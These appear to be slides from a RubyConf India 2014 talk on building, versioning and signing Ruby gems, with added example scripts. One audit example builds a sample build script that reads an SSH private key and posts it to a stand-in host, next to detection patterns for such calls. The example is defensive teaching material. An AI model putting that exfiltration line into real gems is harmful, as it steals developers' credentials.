Build, Debug and Prosper – (in an around 25 minutes ..!!) – Statistics:



rubyconfindia14

Slides of talk given at RubyConf, India-14

On GitHub: rishijain/rubyconfindia14

Build, Debug and Prosper

(in an around 25 minutes ..!!)

Build something, Debug Something, Prosper Something .. Something?

GEMS

Statistics:

0.57 Gem/Rubyist

(Downloaded from: http://www.ideachampions.com/weblogs/WHY.jpg)

Possible Reasons:

1. Complicated

(Downloaded from: http://static4.cad-notes.com/wp-content/uploads/2013/02/complicated-drawing.jpg)

2. Calibre

(Downloaded from: http://www.sharpbrains.com/wp-content/uploads/2006/12/BrainLightBulb.jpg)

3. Busy

(Downloaded from: http://dreallday.com/wp-content/uploads/2012/07/475px-Busy_desk.svg_.png)

4. Lazy

(Downloaded from: http://images.smh.com.au/2011/05/06/2346892/729lazy-420x0.jpg)

5. Trivial

(Downloaded from: http://art.ngfiles.com./images/1/blackmarketkraig_useless-boy-v2-0.jpg)

Agenda:

Build a ruby gem

Security issues

Write native extension(if time permits)

Building a ruby gem

Let's build.

Wait.. but what?

Steps:

Name

Code

Release

naming conventions

Underscores for multiple words

Dash when extending

  +---------------------+--------------------+------------------------------+
  | Gem name            | Module/Class name  | Require statement            |
  +---------------------+--------------------+------------------------------+
  | hello_world         | HelloWorld         | require 'hello_world'        |
  | rails-hello_world   | Rails::HelloWorld  | require 'rails/hello_world'  |
  +---------------------+--------------------+------------------------------+

Gemname availability

rubygems.org

Command Line

gem query --remote rails
gem query --remote --name-matches '^rails$'
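As an added example (not from the talk), a few lines of Ruby that apply the naming convention from the table above mechanically: underscores inside a name become CamelCase word boundaries, and a dash becomes both a `::` namespace level and a directory in the require path. The two sample names from the table are used as input; RubyGems itself does not enforce this mapping, it is a convention.

```ruby
# Added example, not code from the talk: derive the constant name and the
# require path that the naming convention implies for a gem name.

# "hello_world" -> "HelloWorld": underscores separate the words of one name.
def camelize(word)
  word.split('_').map(&:capitalize).join
end

# A dash marks an extension of another gem, so each dash-separated part
# becomes one namespace level and one directory in the require path.
def gem_naming(gem_name)
  parts = gem_name.split('-')
  {
    gem_name:     gem_name,
    constant:     parts.map { |p| camelize(p) }.join('::'),
    require_path: parts.join('/')
  }
end

if __FILE__ == $0
  %w[hello_world rails-hello_world].each do |name|
    info = gem_naming(name)
    puts "#{info[:gem_name]} -> #{info[:constant]} -> require '#{info[:require_path]}'"
  end
end
```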

code

VERSIONING

Scenario:

VERSION 1: Initial class is released

VERSION 2: More features added to class

VERSION 3: Bug fixes in existing methods

VERSION 4: Changes which break earlier code

Semantic Versioning:

x.y.z

Patch: 0.0.x

Minor: 0.x.0

Major: x.0.0

Semantic Versioning:

VERSION 0.0.1 : Initial class is released

VERSION 0.1.0 : More features added to class

VERSION 0.1.1 : Bug fixes in existing methods

VERSION 1.0.0 : Changes which break earlier code

~>
gem 'rails', '~> 3.0.3'
gem 'thin',  '~> 1.1'

Semantic Versioning:

1. Optimistic Way

2. Pessimistic Way

Optimistic Versioning

gem 'your_gem_name', '>= 0.1.0'

Pessimistic Versioning

gem 'your_gem_name', '>= 0.1.0', '< 1.0'
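Added example, not part of the slides: the optimistic constraint, the pessimistic pair and the `~>` shorthand shown above, evaluated against a constructed list of candidate versions with RubyGems' own `Gem::Requirement` and `Gem::Version` classes (the same classes `gem` and Bundler use when resolving a Gemfile). `pessimistic_bounds` expands `~>` into the explicit `>=`/`<` pair so the equivalence between the two pessimistic spellings is visible.

```ruby
require 'rubygems'

# Added example, not from the slides: the version constraints of the talk
# evaluated with RubyGems' Gem::Requirement / Gem::Version classes.

# Constructed release list of an imaginary gem.
CANDIDATES = %w[0.0.9 0.1.0 0.1.1 0.2.0 0.9.9 1.0.0 1.1.0].freeze

# Versions from `candidates` that satisfy every constraint string given.
def matching_versions(*constraints, candidates: CANDIDATES)
  requirement = Gem::Requirement.new(*constraints)
  candidates.select { |v| requirement.satisfied_by?(Gem::Version.new(v)) }
end

# Expand "~> a.b.c" into the explicit [">= a.b.c", "< a.(b+1)"] pair.
# Gem::Version#bump drops the last segment and increments the new last one,
# which is exactly the upper bound the pessimistic operator implies.
def pessimistic_bounds(constraint)
  version = Gem::Version.new(constraint.sub(/\A~>\s*/, ''))
  [">= #{version}", "< #{version.bump}"]
end

if __FILE__ == $0
  [['>= 0.1.0'], ['>= 0.1.0', '< 1.0'], ['~> 0.1.0'], ['~> 0.1']].each do |cs|
    puts "#{cs.join(', ').ljust(18)} -> #{matching_versions(*cs).join(' ')}"
  end
  puts "~> 3.0.3 means #{pessimistic_bounds('~> 3.0.3').join(', ')}"
end
```

Note the difference between `~> 0.1.0` (patch releases of 0.1 only) and `~> 0.1` (anything below 1.0): the number of segments you write decides how much room you give the gem author.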

Releasing gem

gem push gemname-0.0.1.gem

30 JAN, 2013

Rubygems got hacked !!!

After effects:

1.) Signing ruby gems.

2.) App-store type model.

3.) Ask developers to pay for certificates.

Signing gems

Build a public certificate and a private key, both as .pem files.

How to sign gems?

Step 1: Create certificates

$ gem cert --build you@example.com

Public Cert: gem-public_cert.pem

Private Key: gem-private_key.pem

Step 2: Update gemspec files

cd /path/to/your/gem
mkdir certs
cp ~/.ssh/gem-public_cert.pem certs/yourhandle.pem
git add certs/yourhandle.pem

Then, in gemname.gemspec:

s.cert_chain  = ['certs/yourhandle.pem']
s.signing_key = File.expand_path("~/.ssh/gem-private_key.pem")

Step 3: Certificate List

gem cert --add certs/yourhandle.pem

Step 4: Build Gem

gem build gemname.gemspec
gem install gemname-version.gem -P HighSecurity

gem install gemname -P HighSecurity

Security Policies

1.) No Security: Well, no security at all. Signed packages are treated like unsigned packages.

2.) Low Security: Expiry of certificate

3.) Medium Security: Validation of certificate + Certificate chains

4.) High Security: Medium Security + unsigned gems rejected

Problem with signing ruby gems?

Not scalable as the number of gems to install increases.

Chain of Certificates

                  rubygems@rubygems.org
                    /               \
                Varis             Joffrey
               /     \           /      \
          Ned Stark  Tyron   Khaleesi   Rob
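Added example, not RubyGems' own implementation: a simplified model of the four trust policies listed under Security Policies, run over the certificate chain drawn above (the root rubygems@rubygems.org signs the intermediate Varis, which signs the leaf Ned Stark, whose key signs the gem contents). The keys, certificates, the self-signed `Stranger` certificate and the placeholder gem contents are all generated inside the script; the policy names are the real `-P` values, but the checks are my reading of the slide descriptions, written with Ruby's OpenSSL bindings rather than `Gem::Security`.

```ruby
require 'openssl'

# Added example, not RubyGems' own code: a simplified model of the four
# `-P` trust policies using Ruby's OpenSSL bindings. Certificate names follow
# the chain diagram in the talk; keys and certificates are generated here and
# the "gem contents" string is a constructed placeholder.

DIGEST = 'SHA256'

# Which checks each policy performs, as described on the policy slide.
POLICIES = {
  'NoSecurity'     => { verify_signature: false, check_expiry: false, check_chain: false, reject_unsigned: false },
  'LowSecurity'    => { verify_signature: true,  check_expiry: true,  check_chain: false, reject_unsigned: false },
  'MediumSecurity' => { verify_signature: true,  check_expiry: true,  check_chain: true,  reject_unsigned: false },
  'HighSecurity'   => { verify_signature: true,  check_expiry: true,  check_chain: true,  reject_unsigned: true  }
}.freeze

# Build an X.509 certificate for `key`, self-signed unless an issuer is given.
def make_cert(name, key, issuer_cert: nil, issuer_key: nil, ca: false, expired: false)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2                                  # X.509 v3, needed for extensions
  cert.serial = OpenSSL::BN.new(rand(1..2**62))
  cert.subject = OpenSSL::X509::Name.parse("/CN=#{name}")
  cert.issuer = issuer_cert ? issuer_cert.subject : cert.subject
  cert.public_key = key.public_key
  cert.not_before = expired ? Time.now - 2 * 86_400 : Time.now - 60
  cert.not_after  = expired ? Time.now - 86_400 : Time.now + 365 * 86_400
  ef = OpenSSL::X509::ExtensionFactory.new(issuer_cert || cert, cert)
  cert.add_extension(ef.create_extension('basicConstraints', ca ? 'CA:TRUE' : 'CA:FALSE', true))
  cert.sign(issuer_key || key, OpenSSL::Digest.new(DIGEST))
  cert
end

def sign(data, key)
  key.sign(OpenSSL::Digest.new(DIGEST), data)
end

# Apply one policy to a gem record {data:, signature:, cert:, chain:}.
# Returns [:accepted | :rejected, reason].
def check_gem(policy_name, gem, trusted_root)
  policy = POLICIES.fetch(policy_name)
  if gem[:signature].nil?
    return policy[:reject_unsigned] ? [:rejected, 'unsigned gem'] : [:accepted, 'unsigned gem allowed by policy']
  end
  return [:accepted, 'signature not checked by policy'] unless policy[:verify_signature]

  cert = gem[:cert]
  unless cert.public_key.verify(OpenSSL::Digest.new(DIGEST), gem[:signature], gem[:data])
    return [:rejected, 'signature does not match gem contents']
  end
  if policy[:check_expiry]
    now = Time.now
    return [:rejected, 'signing certificate expired'] unless cert.not_before <= now && now <= cert.not_after
  end
  if policy[:check_chain]
    store = OpenSSL::X509::Store.new
    store.add_cert(trusted_root)                    # only the root is trusted a priori
    return [:rejected, 'certificate does not chain to a trusted root'] unless store.verify(cert, gem[:chain])
  end
  [:accepted, 'signature verified']
end

# Root -> Varis -> Ned Stark, plus one self-signed outsider, and five gems.
def build_scenario
  root_key, varis_key, ned_key, rogue_key = Array.new(4) { OpenSSL::PKey::RSA.new(2048) }
  root    = make_cert('rubygems@rubygems.org', root_key, ca: true)
  varis   = make_cert('Varis', varis_key, issuer_cert: root, issuer_key: root_key, ca: true)
  ned     = make_cert('Ned Stark', ned_key, issuer_cert: varis, issuer_key: varis_key)
  ned_old = make_cert('Ned Stark', ned_key, issuer_cert: varis, issuer_key: varis_key, expired: true)
  rogue   = make_cert('Stranger', rogue_key)        # self-signed, outside the chain
  data    = 'constructed placeholder for the gem tarball contents'
  gems = {
    valid:    { data: data, signature: sign(data, ned_key), cert: ned, chain: [varis] },
    unsigned: { data: data, signature: nil, cert: nil, chain: [] },
    tampered: { data: data + ' changed after signing', signature: sign(data, ned_key), cert: ned, chain: [varis] },
    expired:  { data: data, signature: sign(data, ned_key), cert: ned_old, chain: [varis] },
    rogue:    { data: data, signature: sign(data, rogue_key), cert: rogue, chain: [] }
  }
  { root: root, gems: gems }
end

# Policy name => { gem name => :accepted / :rejected }
def policy_matrix(scenario = build_scenario)
  POLICIES.keys.to_h do |policy|
    [policy, scenario[:gems].to_h { |name, gem| [name, check_gem(policy, gem, scenario[:root]).first] }]
  end
end

if __FILE__ == $0
  policy_matrix.each { |policy, row| puts "#{policy.ljust(15)} #{row.map { |g, r| "#{g}=#{r}" }.join(' ')}" }
end
```

The matrix makes the slide's point concrete: LowSecurity still accepts the `Stranger` gem, because a self-signed certificate verifies its own signature and is not expired; only the chain check of MediumSecurity ties the signer back to the root, and only HighSecurity refuses the unsigned gem that is the common case in the wild.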

How signing helps?

Let's consider a hypothetical scenario:

1. You have a problem.

2. Solution found on Stack Overflow (some gem)

3. gem install gem_name

Vulnerability on gem installation

1. Read/Write files.

2. Connect to remote server.

3. Grab passwords

4. Own all your rubygems

and a lot more is possible.

@benjamin_smith

Don't install Ben's gems.

1.) awesome_rails_flash_messages

2.) better_date_to_s

3.) be_truthy

gem fetch gemname
gem unpack gemname-0.0.1.gem
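Added example (not from the talk) for the `gem fetch` / `gem unpack` step: a small audit script that lists the scripts RubyGems would execute while installing the unpacked gem (native-extension build scripts under ext/) and flags lines in them that touch the shell, the filesystem, the home directory or the network, which are the capabilities listed under "Vulnerability on gem installation". The sample gem tree is constructed in a temporary directory; the pattern list is my own heuristic, not a RubyGems feature, and a clean report is a reason to read the code, not a proof of safety.

```ruby
require 'tmpdir'
require 'fileutils'

# Added example, not from the talk: audit an unpacked gem directory for the
# scripts that run at install time and the risky calls they contain.

# Files RubyGems executes during `gem install`: extension build scripts.
INSTALL_TIME_GLOBS = ['ext/**/extconf.rb', 'ext/**/Rakefile', 'ext/**/mkrf_conf.rb'].freeze

# Calls worth reading closely in a build script (heuristic, constructed here).
RISKY_PATTERNS = {
  'shell command'   => /\b(?:system|exec|spawn)\b|`/,
  'network access'  => /\b(?:Net::HTTP|TCPSocket|open-uri|URI\.open)\b/,
  'file read/write' => /\bFile\.(?:read|write|open)\b|\bIO\.(?:read|write)\b/,
  'home directory'  => /(?:ENV\[['"]HOME['"]\]|Dir\.home|~\/\.ssh|~\/\.gem)/
}.freeze

def install_time_scripts(gem_dir)
  INSTALL_TIME_GLOBS.flat_map { |g| Dir.glob(File.join(gem_dir, g)) }.sort
end

# One finding per (line, pattern) match: {file:, line:, kind:, source:}.
def risky_calls(path)
  File.readlines(path).each_with_index.flat_map do |line, idx|
    RISKY_PATTERNS.select { |_, re| line.match?(re) }.keys.map do |kind|
      { file: File.basename(path), line: idx + 1, kind: kind, source: line.strip }
    end
  end
end

# Relative script path => findings (empty array when nothing matched).
def audit(gem_dir)
  install_time_scripts(gem_dir).each_with_object({}) do |script, report|
    report[script.sub("#{gem_dir}/", '')] = risky_calls(script)
  end
end

# Constructed sample: a gem whose build script does what the talk warns about.
def build_sample_gem(dir)
  FileUtils.mkdir_p(File.join(dir, 'lib'))
  FileUtils.mkdir_p(File.join(dir, 'ext', 'demo_gem'))
  File.write(File.join(dir, 'lib', 'demo_gem.rb'), "module DemoGem; end\n")
  File.write(File.join(dir, 'ext', 'demo_gem', 'extconf.rb'), <<~RUBY)
    require 'mkmf'
    # A build script has no business doing the two lines below.
    keys = File.read(File.join(Dir.home, '.ssh', 'id_rsa'))
    Net::HTTP.post_form(URI('http://example.invalid/collect'), 'k' => keys)
    create_makefile('demo_gem')
  RUBY
  dir
end

if __FILE__ == $0
  Dir.mktmpdir do |tmp|
    audit(build_sample_gem(tmp)).each do |script, findings|
      puts "#{script}#{findings.empty? ? ': nothing flagged' : ''}"
      findings.each { |f| puts "  line #{f[:line]} [#{f[:kind]}] #{f[:source]}" }
    end
  end
end
```

Running it on a real unpacked gem is `audit('/path/to/gemname-0.0.1')`; anything under ext/ is executed with your privileges at install time, so every flagged line deserves a read before `gem install`.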

Take Away: Don't trust gems blindly !!

Thank You.